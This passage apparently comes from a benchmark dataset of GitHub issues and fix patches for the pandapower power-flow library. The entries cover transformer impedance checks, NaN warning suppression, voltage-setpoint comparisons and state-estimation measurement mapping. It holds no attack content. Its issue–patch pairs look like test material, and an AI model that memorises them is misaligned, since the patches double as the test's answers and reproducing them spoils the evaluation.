is still open, but if you can investigate both approaches it would be interesting to compare the results. > So for proper consideration of a phase-shifting transformer additional parameter (such as du in powerFactory) should be added? In the two winding transformer model there is a parameter "trafo.tp_st_degree" to model phase shifting transformer, but it has not been implemented for 3W transformers yet. I removed the code that is currently unused. For now I am closing this issue since nobody currently seems to be working on this and there also wasn't any test data supplied for a case where this problem occurrs. @jkrstulo if you want to continue working on this, feel free to reopen the issue and recover the code from this commit!
2018-04-25T11:24:41
e2nIEE/pandapower
136
e2nIEE__pandapower-136
[ "132" ]
0fe4315805ec5bb5e20797e20378203752fa51b6
diff --git a/pandapower/build_branch.py b/pandapower/build_branch.py --- a/pandapower/build_branch.py +++ b/pandapower/build_branch.py @@ -497,6 +497,8 @@ def _trafo_df_from_trafo3w(net): i += 1 trafo_df = pd.DataFrame.from_dict(trafos2w, orient="index") + if any(trafo_df.vsc_percent==0): + raise UserWarning("Equivalent transformer with zero impedance!") return trafo_df
3W transformer equivalent can have zero impedance For three-winding transformers with specific parameters it is possible to get equivalent transformers with zero impedance. While this is probably due to bad data, currently pandapower does not check this and the powerflow does not convergence with the warning RuntimeWarning: divide by zero encountered in true_divide Ysf = stat / (branch[:, BR_R] + 1j * branch[:, BR_X]) ## series admittance While this is a clear hint at the problem, finding the faulty element is not very straightforward. I suggest at least a check in `_trafo_df_from_trafo3w()` like the following: ``` if any(trafo_df.vsc_percent==0): raise UserWarning("Equivalent Trafo with zero impedance!") ``` One could also add a small Impedance to let the powerflow continue...
The transformer in my case has the following parameters: ``` std_type None hv_bus 24 mv_bus 25 lv_bus 23 sn_hv_kva 140000 sn_mv_kva 70000 sn_lv_kva 70000 vn_hv_kv 150 vn_mv_kv 22 vn_lv_kv 22 vsc_hv_percent 12 vsc_mv_percent 24 vsc_lv_percent 12 vscr_hv_percent 0 vscr_mv_percent 0 vscr_lv_percent 0 pfe_kw 0 i0_percent 0 in_service True ```
2018-07-26T09:04:04
e2nIEE/pandapower
138
e2nIEE__pandapower-138
[ "137" ]
e1f7ed31e9dec3c412e8fde26591a2ba697e96ea
diff --git a/pandapower/results_branch.py b/pandapower/results_branch.py --- a/pandapower/results_branch.py +++ b/pandapower/results_branch.py @@ -112,7 +112,8 @@ def _get_trafo_results(net, ppc, s_ft, i_ft): vns = np.vstack([trafo_df["vn_hv_kv"].values, trafo_df["vn_lv_kv"].values]).T lds_trafo = i_ft[f:t] * vns * 1000. * np.sqrt(3) \ / trafo_df["sn_kva"].values[:, np.newaxis] * 100. - ld_trafo = np.max(lds_trafo, axis=1) + with np.errstate(invalid='ignore'): + ld_trafo = np.max(lds_trafo, axis=1) elif trafo_loading == "power": ld_trafo = np.max(s_ft[f:t] / net["trafo"]["sn_kva"].values[:, np.newaxis] * 100., axis=1) else: @@ -182,7 +183,8 @@ def _get_trafo3w_results(net, ppc, s_ft, i_ft): ld_h = i_h * t3["vn_hv_kv"].values * 1000. * np.sqrt(3) / t3["sn_hv_kva"].values * 100 ld_m = i_m * t3["vn_mv_kv"].values * 1000. * np.sqrt(3) / t3["sn_mv_kva"].values * 100 ld_l = i_l * t3["vn_lv_kv"].values * 1000. * np.sqrt(3) / t3["sn_lv_kva"].values * 100 - ld_trafo = np.max(np.vstack([ld_h, ld_m, ld_l]), axis=0) + with np.errstate(invalid='ignore'): + ld_trafo = np.max(np.vstack([ld_h, ld_m, ld_l]), axis=0) elif trafo_loading == "power": ld_h = s_ft[:, 0][f:hv] / t3["sn_hv_kva"] * 100. ld_m = s_ft[:, 1][hv:mv] / t3["sn_mv_kva"] * 100. @@ -274,5 +276,7 @@ def _get_switch_results(net, i_ft): if not "switch" in net._pd2ppc_lookups["branch"]: return f, t = net._pd2ppc_lookups["branch"]["switch"] - net["res_switch"] = pd.DataFrame(data=np.max(i_ft[f:t], axis=1), columns=["i_ka"], + with np.errstate(invalid='ignore'): + i_ka = np.max(i_ft[f:t], axis=1) + net["res_switch"] = pd.DataFrame(data=i_ka, columns=["i_ka"], index=net.switch[net._closed_bb_switches].index)
NaN results in branch current Running a powerflow with oos buses (BUS_TYPE=NONE) in the ppc results in warnings when calculating the branch results because theses buses have no voltage results: ``` RuntimeWarning: invalid value encountered in reduce return umr_maximum(a, axis, None, out, keepdims) ``` A possible fix is in https://github.com/WinfriedL/pandapower/commit/0f09276c3f2bb1544acb8bd2d42c9980b15902e5 Not sure if this is the best solution...
I also remember there was some inconsistency in the branch results . I think out_of_service lines have a loading of zero percent, while disconnected lines have nan or something like that? Is this issue related? > I think out_of_service lines have a loading of zero percent, while disconnected lines have nan or something like that? Is this issue related? Yes I think this exactly the issue. Islolated Lines have no voltage result (nan) at the from/to bus, so dividing s_ft (which is zero) by u_ft gives nan results for i_ft and loading_percent. The question is if nan is a valid powerflow result for isolated buses/lines. If not, maybe there should be no nan result for the bus voltage in the first place. However, a 'correct' voltage result for isolated buses would be zero, but this would also lead to nan results for lines. Maybe a better defined approach would be `i_ft = np.where(s_ft==0., 0., s_ft * 1e-3 / u_ft / np.sqrt(3))` instead of brute force filling all nan and inf values... If nan results are valid, maybe the warning should be suppressed with np.seterr()? After talking to @SteffenMeinecke , the issue that I remembered was that lines with two open switches at both sides have a loading of zero, while all other disconnected/out of service lines have nan. This is a different issue that comes from the fact that we explicitely deal with the "open switches at both sides of the line" case as a special case. So its not exactly the same issue, but related. > The question is if nan is a valid powerflow result for isolated buses/lines. If not, maybe there should be no nan result for the bus voltage in the first place. However, a 'correct' voltage result for isolated buses would be zero, but this would also lead to nan results for lines. Its true that it would be physically correct to say a disconnected bus has zero voltage, but one could also argue that the power flow doesn't calculate a voltage value for that bus, therefore no number is assigned. From a practical perspective, I like the clear differentiation between "result" (a number) and "no result" (not a number). It wouldn't be very practical always having to filter out the 0 values when calculating for example the minimum voltage or medium line loading in a grid. > If nan results are valid, maybe the warning should be suppressed with np.seterr()? That however changes the behaviour numpy-wide even outside pandapower. What version of numpy are using btw, because I can't reproduce the warning with numpy 1.14.5. Does this: ``` np.array([1,np.nan,3]) / np.array([3,4,np.nan]) ``` give a warning for you? Or am looking at the wrong case here? > Does this: np.array([1,np.nan,3]) / np.array([3,4,np.nan]) give a warning for you? Or am looking at the wrong case here? No, the line giving the warning is in fact this one: https://github.com/e2nIEE/pandapower/blob/5516e064f6e807ab38e4bc2f28f5239ea4627341/pandapower/results_branch.py#L66 I should have mentioned that before, sorry. > I like the clear differentiation between "result" (a number) and "no result" (not a number) So the issue would be how to get np.max() to return nan, but not issue a warning about that... Of course this is not high priority, since in principle everything works, but always having a RuntimeWarning when everything works as intended seems kind of awkward. > Of course this is not high priority, since in principle everything works, but always having a RuntimeWarning when everything works as intended seems kind of awkward. Definetly. Seems like this warning was recently introduced, at least with numpy 1.11 I don't get that warning. Instead of using np.seterr, I suggest using np.errstate to supress the warning only in this line: ``` with np.errstate(invalid='ignore'): i_ka = np.max(i_ft[f:t], axis=1) ``` I pushed the fix as suggested above. I also checked on the two-open switches at one line issue as descibed above, and it seems like that has since been fixed and now also returns nan results, so everything seems to be consistent. So if the fix works for you, this issue can be closed? Yes this can be closed, thanks! I closed too early. Not surprisingly the same happens now for transformer branches. np.max() is not used for impedances, so there should be no problem. But switches use it, I guess only if switches have a resistance? The fix should be straightforward, should I do it and make a pull request or do you want to add that yourself?
2018-07-31T08:34:54
e2nIEE/pandapower
221
e2nIEE__pandapower-221
[ "216", "216" ]
f01d0efea8b6d46146077d2ea64c18142eb15291
diff --git a/pandapower/build_gen.py b/pandapower/build_gen.py --- a/pandapower/build_gen.py +++ b/pandapower/build_gen.py @@ -460,4 +460,4 @@ def _different_values_at_one_bus(buses, values): # have the voltage of the first generator at that bus values_equal = first_values[buses] - return not np.array_equal(values, values_equal) + return not np.allclose(values, values_equal)
pp.runpp fails with "Generators with different voltage setpoints connected to the same bus", BUT all setpoints are equal in grid model. Hi, in build_gen.py (Line 463) an equality check is made. But due to some conversions made before, this check fails: ``` python values = [1.00999999 1.00999999 1.00999999 1.00999999 1. 1.01 1. ] values_equal = [1.00999999 1.00999999 1.00999999 1.00999999 1. 1.00999999 1. ] ``` Attached is the problematic grid in pickle, using pandapower 1.6.0 develop commit b7136d72ca66a1fcfdcf2460d40c35dac38f02a0 and python 3.7 ``` Traceback (most recent call last): File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\run.py", line 294, in runpp _powerflow(net, **kwargs) File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\powerflow.py", line 66, in _powerflow ppc, ppci = _pd2ppc(net) File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\pd2ppc.py", line 114, in _pd2ppc _check_voltage_setpoints_at_same_bus(ppc) File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\build_gen.py", line 437, in _check_voltage_setpoints_at_same_bus raise UserWarning("Generators with different voltage setpoints connected to the same bus") UserWarning: Generators with different voltage setpoints connected to the same bus ``` BR V3 pp.runpp fails with "Generators with different voltage setpoints connected to the same bus", BUT all setpoints are equal in grid model. Hi, in build_gen.py (Line 463) an equality check is made. But due to some conversions made before, this check fails: ``` python values = [1.00999999 1.00999999 1.00999999 1.00999999 1. 1.01 1. ] values_equal = [1.00999999 1.00999999 1.00999999 1.00999999 1. 1.00999999 1. ] ``` Attached is the problematic grid in pickle, using pandapower 1.6.0 develop commit b7136d72ca66a1fcfdcf2460d40c35dac38f02a0 and python 3.7 ``` Traceback (most recent call last): File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\run.py", line 294, in runpp _powerflow(net, **kwargs) File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\powerflow.py", line 66, in _powerflow ppc, ppci = _pd2ppc(net) File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\pd2ppc.py", line 114, in _pd2ppc _check_voltage_setpoints_at_same_bus(ppc) File "C:\Anaconda3\envs\py37\lib\site-packages\pandapower\build_gen.py", line 437, in _check_voltage_setpoints_at_same_bus raise UserWarning("Generators with different voltage setpoints connected to the same bus") UserWarning: Generators with different voltage setpoints connected to the same bus ``` BR V3
2018-11-26T16:09:55
e2nIEE/pandapower
249
e2nIEE__pandapower-249
[ "248" ]
e3ca203de59e37b22dd5309794cd94202608a852
diff --git a/pandapower/estimation/wls_ppc_conversions.py b/pandapower/estimation/wls_ppc_conversions.py --- a/pandapower/estimation/wls_ppc_conversions.py +++ b/pandapower/estimation/wls_ppc_conversions.py @@ -66,19 +66,30 @@ def _add_measurements_to_ppc(net, ppci): std_logger.warning("Measurement defined in pp-grid does not exist in ppci! Will be deleted!") meas_bus = meas_bus[map_bus[meas_bus['element']] < ppci["bus"].shape[0]] - map_line, map_trafo, map_trafo3w = None, None, None # mapping to dict instead of np array ensures good performance for large indices # (e.g., 999999999 requires a large np array even if there are only 2 buses) # downside is loop comprehension to access the map + map_line, map_trafo, map_trafo3w = None, None, None + branch_mask = ppci['internal']['branch_is'] if "line" in net["_pd2ppc_lookups"]["branch"]: - map_line = dict(zip(net.line.index, range(*net["_pd2ppc_lookups"]["branch"]["line"]))) + map_line = {line_ix: br_ix for line_ix, br_ix in + zip(net.line.index, range(*net["_pd2ppc_lookups"]["branch"]["line"])) if branch_mask[br_ix]} + if "trafo" in net["_pd2ppc_lookups"]["branch"]: - map_trafo = dict(zip(net.trafo.index, range(*net["_pd2ppc_lookups"]["branch"]["trafo"]))) + trafo_ix_start, trafo_ix_end = net["_pd2ppc_lookups"]["branch"]["trafo"] + trafo_ix_offset = np.sum(~branch_mask[:trafo_ix_start]) + trafo_ix_start, trafo_ix_end = trafo_ix_start - trafo_ix_offset, trafo_ix_end - trafo_ix_offset + map_trafo = {trafo_ix: br_ix for trafo_ix, br_ix in + zip(net.trafo.index, range(trafo_ix_start, trafo_ix_end)) + if branch_mask[br_ix+trafo_ix_offset]} if "trafo3w" in net["_pd2ppc_lookups"]["branch"]: - map_trafo3w = {ix: {'hv': br_ix, 'mv': br_ix+1, 'lv': br_ix+2} - for ix, br_ix in zip(net.trafo3w.index, - range(*(net["_pd2ppc_lookups"]["branch"]["trafo3w"]+(3,))))} + trafo3w_ix_start, trafo3w_ix_end = net["_pd2ppc_lookups"]["branch"]["trafo3w"] + trafo3w_ix_offset = np.sum(~branch_mask[:trafo3w_ix_start]) + trafo3w_ix_start, trafo3w_ix_end = trafo3w_ix_start - trafo3w_ix_offset, trafo3w_ix_end - trafo3w_ix_offset + map_trafo3w = {trafo3w_ix: {'hv': br_ix, 'mv': br_ix+1, 'lv': br_ix+2} for trafo3w_ix, br_ix in + zip(net.trafo3w.index, range(trafo3w_ix_start, trafo3w_ix_end, 3)) + if branch_mask[br_ix+trafo3w_ix_offset]} # set measurements for ppc format # add 9 columns to ppc[bus] for Vm, Vm std dev, P, P std dev, Q, Q std dev, @@ -120,52 +131,56 @@ def _add_measurements_to_ppc(net, ppci): branch_append = np.full((ppci["branch"].shape[0], branch_cols_se), np.nan, dtype=ppci["branch"].dtype) - i_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "line")] - if len(i_measurements): - meas_from = i_measurements[(i_measurements.side.values.astype(int) == - net.line.from_bus[i_measurements.element]).values] - meas_to = i_measurements[(i_measurements.side.values.astype(int) == - net.line.to_bus[i_measurements.element]).values] - ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] - ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] - i_ka_to_pu_from = (net.bus.vn_kv[meas_from.side]).values * 1e3 - i_ka_to_pu_to = (net.bus.vn_kv[meas_to.side]).values * 1e3 - branch_append[ix_from, IM_FROM] = meas_from.value.values * i_ka_to_pu_from - branch_append[ix_from, IM_FROM_STD] = meas_from.std_dev.values * i_ka_to_pu_from - branch_append[ix_from, IM_FROM_IDX] = meas_from.index.values - branch_append[ix_to, IM_TO] = meas_to.value.values * i_ka_to_pu_to - branch_append[ix_to, IM_TO_STD] = meas_to.std_dev.values * i_ka_to_pu_to - branch_append[ix_to, IM_TO_IDX] = meas_to.index.values - - p_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "line")] - if len(p_measurements): - meas_from = p_measurements[(p_measurements.side.values.astype(int) == - net.line.from_bus[p_measurements.element]).values] - meas_to = p_measurements[(p_measurements.side.values.astype(int) == - net.line.to_bus[p_measurements.element]).values] - ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] - ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] - branch_append[ix_from, P_FROM] = meas_from.value.values - branch_append[ix_from, P_FROM_STD] = meas_from.std_dev.values - branch_append[ix_from, P_FROM_IDX] = meas_from.index.values - branch_append[ix_to, P_TO] = meas_to.value.values - branch_append[ix_to, P_TO_STD] = meas_to.std_dev.values - branch_append[ix_to, P_TO_IDX] = meas_to.index.values - - q_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "line")] - if len(q_measurements): - meas_from = q_measurements[(q_measurements.side.values.astype(int) == - net.line.from_bus[q_measurements.element]).values] - meas_to = q_measurements[(q_measurements.side.values.astype(int) == - net.line.to_bus[q_measurements.element]).values] - ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] - ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] - branch_append[ix_from, Q_FROM] = meas_from.value.values - branch_append[ix_from, Q_FROM_STD] = meas_from.std_dev.values - branch_append[ix_from, Q_FROM_IDX] = meas_from.index.values - branch_append[ix_to, Q_TO] = meas_to.value.values - branch_append[ix_to, Q_TO_STD] = meas_to.std_dev.values - branch_append[ix_to, Q_TO_IDX] = meas_to.index.values + if map_line is not None: + i_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "line") &\ + meas.element.isin(map_line)] + if len(i_measurements): + meas_from = i_measurements[(i_measurements.side.values.astype(int) == + net.line.from_bus[i_measurements.element]).values] + meas_to = i_measurements[(i_measurements.side.values.astype(int) == + net.line.to_bus[i_measurements.element]).values] + ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] + ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] + i_ka_to_pu_from = (net.bus.vn_kv[meas_from.side]).values * 1e3 + i_ka_to_pu_to = (net.bus.vn_kv[meas_to.side]).values * 1e3 + branch_append[ix_from, IM_FROM] = meas_from.value.values * i_ka_to_pu_from + branch_append[ix_from, IM_FROM_STD] = meas_from.std_dev.values * i_ka_to_pu_from + branch_append[ix_from, IM_FROM_IDX] = meas_from.index.values + branch_append[ix_to, IM_TO] = meas_to.value.values * i_ka_to_pu_to + branch_append[ix_to, IM_TO_STD] = meas_to.std_dev.values * i_ka_to_pu_to + branch_append[ix_to, IM_TO_IDX] = meas_to.index.values + + p_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "line") & + meas.element.isin(map_line)] + if len(p_measurements): + meas_from = p_measurements[(p_measurements.side.values.astype(int) == + net.line.from_bus[p_measurements.element]).values] + meas_to = p_measurements[(p_measurements.side.values.astype(int) == + net.line.to_bus[p_measurements.element]).values] + ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] + ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] + branch_append[ix_from, P_FROM] = meas_from.value.values + branch_append[ix_from, P_FROM_STD] = meas_from.std_dev.values + branch_append[ix_from, P_FROM_IDX] = meas_from.index.values + branch_append[ix_to, P_TO] = meas_to.value.values + branch_append[ix_to, P_TO_STD] = meas_to.std_dev.values + branch_append[ix_to, P_TO_IDX] = meas_to.index.values + + q_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "line") & + meas.element.isin(map_line)] + if len(q_measurements): + meas_from = q_measurements[(q_measurements.side.values.astype(int) == + net.line.from_bus[q_measurements.element]).values] + meas_to = q_measurements[(q_measurements.side.values.astype(int) == + net.line.to_bus[q_measurements.element]).values] + ix_from = [map_line[l] for l in meas_from.element.values.astype(int)] + ix_to = [map_line[l] for l in meas_to.element.values.astype(int)] + branch_append[ix_from, Q_FROM] = meas_from.value.values + branch_append[ix_from, Q_FROM_STD] = meas_from.std_dev.values + branch_append[ix_from, Q_FROM_IDX] = meas_from.index.values + branch_append[ix_to, Q_TO] = meas_to.value.values + branch_append[ix_to, Q_TO_STD] = meas_to.std_dev.values + branch_append[ix_to, Q_TO_IDX] = meas_to.index.values # TODO review in 2019 -> is this a use case? create test with switches on lines # determine number of lines in ppci["branch"] @@ -180,120 +195,128 @@ def _add_measurements_to_ppc(net, ppci): # & (np.in1d(net["switch"]["element"].values, lines_is.index)) \ # & (np.in1d(net["switch"]["bus"].values, bus_is_idx)) # ppci_lines = len(lines_is) - np.count_nonzero(slidx) - - i_tr_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "trafo")] - if len(i_tr_measurements): - meas_from = i_tr_measurements[(i_tr_measurements.side.values.astype(int) == - net.trafo.hv_bus[i_tr_measurements.element]).values] - meas_to = i_tr_measurements[(i_tr_measurements.side.values.astype(int) == - net.trafo.lv_bus[i_tr_measurements.element]).values] - ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] - ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] - i_ka_to_pu_from = (net.bus.vn_kv[meas_from.side]).values * 1e3 - i_ka_to_pu_to = (net.bus.vn_kv[meas_to.side]).values * 1e3 - branch_append[ix_from, IM_FROM] = meas_from.value.values * i_ka_to_pu_from - branch_append[ix_from, IM_FROM_STD] = meas_from.std_dev.values * i_ka_to_pu_from - branch_append[ix_from, IM_FROM_IDX] = meas_from.index.values - branch_append[ix_to, IM_TO] = meas_to.value.values * i_ka_to_pu_to - branch_append[ix_to, IM_TO_STD] = meas_to.std_dev.values * i_ka_to_pu_to - branch_append[ix_to, IM_TO_IDX] = meas_to.index.values - - p_tr_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "trafo")] - if len(p_tr_measurements): - meas_from = p_tr_measurements[(p_tr_measurements.side.values.astype(int) == - net.trafo.hv_bus[p_tr_measurements.element]).values] - meas_to = p_tr_measurements[(p_tr_measurements.side.values.astype(int) == - net.trafo.lv_bus[p_tr_measurements.element]).values] - ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] - ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] - branch_append[ix_from, P_FROM] = meas_from.value.values - branch_append[ix_from, P_FROM_STD] = meas_from.std_dev.values - branch_append[ix_from, P_FROM_IDX] = meas_from.index.values - branch_append[ix_to, P_TO] = meas_to.value.values - branch_append[ix_to, P_TO_STD] = meas_to.std_dev.values - branch_append[ix_to, P_TO_IDX] = meas_to.index.values - - q_tr_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "trafo")] - if len(q_tr_measurements): - meas_from = q_tr_measurements[(q_tr_measurements.side.values.astype(int) == - net.trafo.hv_bus[q_tr_measurements.element]).values] - meas_to = q_tr_measurements[(q_tr_measurements.side.values.astype(int) == - net.trafo.lv_bus[q_tr_measurements.element]).values] - ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] - ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] - branch_append[ix_from, Q_FROM] = meas_from.value.values - branch_append[ix_from, Q_FROM_STD] = meas_from.std_dev.values - branch_append[ix_from, Q_FROM_IDX] = meas_from.index.values - branch_append[ix_to, Q_TO] = meas_to.value.values - branch_append[ix_to, Q_TO_STD] = meas_to.std_dev.values - branch_append[ix_to, Q_TO_IDX] = meas_to.index.values + + if map_trafo is not None: + i_tr_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "trafo") & + meas.element.isin(map_trafo)] + if len(i_tr_measurements): + meas_from = i_tr_measurements[(i_tr_measurements.side.values.astype(int) == + net.trafo.hv_bus[i_tr_measurements.element]).values] + meas_to = i_tr_measurements[(i_tr_measurements.side.values.astype(int) == + net.trafo.lv_bus[i_tr_measurements.element]).values] + ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] + ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] + i_ka_to_pu_from = (net.bus.vn_kv[meas_from.side]).values * 1e3 + i_ka_to_pu_to = (net.bus.vn_kv[meas_to.side]).values * 1e3 + branch_append[ix_from, IM_FROM] = meas_from.value.values * i_ka_to_pu_from + branch_append[ix_from, IM_FROM_STD] = meas_from.std_dev.values * i_ka_to_pu_from + branch_append[ix_from, IM_FROM_IDX] = meas_from.index.values + branch_append[ix_to, IM_TO] = meas_to.value.values * i_ka_to_pu_to + branch_append[ix_to, IM_TO_STD] = meas_to.std_dev.values * i_ka_to_pu_to + branch_append[ix_to, IM_TO_IDX] = meas_to.index.values + + p_tr_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "trafo") & + meas.element.isin(map_trafo)] + if len(p_tr_measurements): + meas_from = p_tr_measurements[(p_tr_measurements.side.values.astype(int) == + net.trafo.hv_bus[p_tr_measurements.element]).values] + meas_to = p_tr_measurements[(p_tr_measurements.side.values.astype(int) == + net.trafo.lv_bus[p_tr_measurements.element]).values] + ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] + ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] + branch_append[ix_from, P_FROM] = meas_from.value.values + branch_append[ix_from, P_FROM_STD] = meas_from.std_dev.values + branch_append[ix_from, P_FROM_IDX] = meas_from.index.values + branch_append[ix_to, P_TO] = meas_to.value.values + branch_append[ix_to, P_TO_STD] = meas_to.std_dev.values + branch_append[ix_to, P_TO_IDX] = meas_to.index.values + + q_tr_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "trafo") & + meas.element.isin(map_trafo)] + if len(q_tr_measurements): + meas_from = q_tr_measurements[(q_tr_measurements.side.values.astype(int) == + net.trafo.hv_bus[q_tr_measurements.element]).values] + meas_to = q_tr_measurements[(q_tr_measurements.side.values.astype(int) == + net.trafo.lv_bus[q_tr_measurements.element]).values] + ix_from = [map_trafo[t] for t in meas_from.element.values.astype(int)] + ix_to = [map_trafo[t] for t in meas_to.element.values.astype(int)] + branch_append[ix_from, Q_FROM] = meas_from.value.values + branch_append[ix_from, Q_FROM_STD] = meas_from.std_dev.values + branch_append[ix_from, Q_FROM_IDX] = meas_from.index.values + branch_append[ix_to, Q_TO] = meas_to.value.values + branch_append[ix_to, Q_TO_STD] = meas_to.std_dev.values + branch_append[ix_to, Q_TO_IDX] = meas_to.index.values - # Add measurements for trafo3w - i_tr3w_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "trafo3w")] - if len(i_tr3w_measurements): - meas_hv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == - net.trafo3w.hv_bus[i_tr3w_measurements.element]).values] - meas_mv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == - net.trafo3w.mv_bus[i_tr3w_measurements.element]).values] - meas_lv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == - net.trafo3w.lv_bus[i_tr3w_measurements.element]).values] - ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] - ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] - ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] - i_ka_to_pu_hv = (net.bus.vn_kv[meas_hv.side]).values - i_ka_to_pu_mv = (net.bus.vn_kv[meas_mv.side]).values - i_ka_to_pu_lv = (net.bus.vn_kv[meas_lv.side]).values - branch_append[ix_hv, IM_FROM] = meas_hv.value.values * i_ka_to_pu_hv - branch_append[ix_hv, IM_FROM_STD] = meas_hv.std_dev.values * i_ka_to_pu_hv - branch_append[ix_hv, IM_FROM_IDX] = meas_hv.index.values - branch_append[ix_mv, IM_TO] = meas_mv.value.values * i_ka_to_pu_mv - branch_append[ix_mv, IM_TO_STD] = meas_mv.std_dev.values * i_ka_to_pu_mv - branch_append[ix_mv, IM_TO_IDX] = meas_mv.index.values - branch_append[ix_lv, IM_TO] = meas_lv.value.values * i_ka_to_pu_lv - branch_append[ix_lv, IM_TO_STD] = meas_lv.std_dev.values * i_ka_to_pu_lv - branch_append[ix_lv, IM_TO_IDX] = meas_lv.index.values - - p_tr3w_measurements = meas[(meas.measurement_type == "p") & (meas.element_type == "trafo3w")] - if len(p_tr3w_measurements): - meas_hv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == - net.trafo3w.hv_bus[p_tr3w_measurements.element]).values] - meas_mv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == - net.trafo3w.mv_bus[p_tr3w_measurements.element]).values] - meas_lv = p_tr3w_measurements[(p_tr3w_measurements.side.values.astype(int) == - net.trafo3w.lv_bus[p_tr3w_measurements.element]).values] - ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] - ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] - ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] - branch_append[ix_hv, P_FROM] = meas_hv.value.values - branch_append[ix_hv, P_FROM_STD] = meas_hv.std_dev.values - branch_append[ix_hv, P_FROM_IDX] = meas_hv.index.values - branch_append[ix_mv, P_TO] = meas_mv.value.values - branch_append[ix_mv, P_TO_STD] = meas_mv.std_dev.values - branch_append[ix_mv, P_TO_IDX] = meas_mv.index.values - branch_append[ix_lv, P_TO] = meas_lv.value.values - branch_append[ix_lv, P_TO_STD] = meas_lv.std_dev.values - branch_append[ix_lv, P_TO_IDX] = meas_lv.index.values - - q_tr3w_measurements = meas[(meas.measurement_type == "q") & (meas.element_type == "trafo3w")] - if len(q_tr3w_measurements): - meas_hv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == - net.trafo3w.hv_bus[q_tr3w_measurements.element]).values] - meas_mv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == - net.trafo3w.mv_bus[q_tr3w_measurements.element]).values] - meas_lv = q_tr3w_measurements[(q_tr3w_measurements.side.values.astype(int) == - net.trafo3w.lv_bus[q_tr3w_measurements.element]).values] - ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] - ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] - ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] - branch_append[ix_hv, Q_FROM] = meas_hv.value.values - branch_append[ix_hv, Q_FROM_STD] = meas_hv.std_dev.values - branch_append[ix_hv, Q_FROM_IDX] = meas_hv.index.values - branch_append[ix_mv, Q_TO] = meas_mv.value.values - branch_append[ix_mv, Q_TO_STD] = meas_mv.std_dev.values - branch_append[ix_mv, Q_TO_IDX] = meas_mv.index.values - branch_append[ix_lv, Q_TO] = meas_lv.value.values - branch_append[ix_lv, Q_TO_STD] = meas_lv.std_dev.values - branch_append[ix_lv, Q_TO_IDX] = meas_lv.index.values + # Add measurements for trafo3w + if map_trafo3w is not None: + i_tr3w_measurements = meas[(meas.measurement_type == "i") & (meas.element_type == "trafo3w") & + meas.element.isin(map_trafo3w)] + if len(i_tr3w_measurements): + meas_hv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == + net.trafo3w.hv_bus[i_tr3w_measurements.element]).values] + meas_mv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == + net.trafo3w.mv_bus[i_tr3w_measurements.element]).values] + meas_lv = i_tr3w_measurements[(i_tr3w_measurements.side.values.astype(int) == + net.trafo3w.lv_bus[i_tr3w_measurements.element]).values] + ix_hv = [map_trafo3w[t]['hv'] for t in meas_hv.element.values.astype(int)] + ix_mv = [map_trafo3w[t]['mv'] for t in meas_mv.element.values.astype(int)] + ix_lv = [map_trafo3w[t]['lv'] for t in meas_lv.element.values.astype(int)] + i_ka_to_pu_hv = (net.bus.vn_kv[meas_hv.side]).values + i_ka_to_pu_mv = (net.bus.vn_kv[meas_mv.side]).values + i_ka_to_pu_lv = (net.bus.vn_kv[meas_lv.side]).values + branch_append[ix_hv, IM_FROM] = meas_hv.value.values * i_ka_to_pu_hv + branch_append[ix_hv, IM_FROM_STD] = 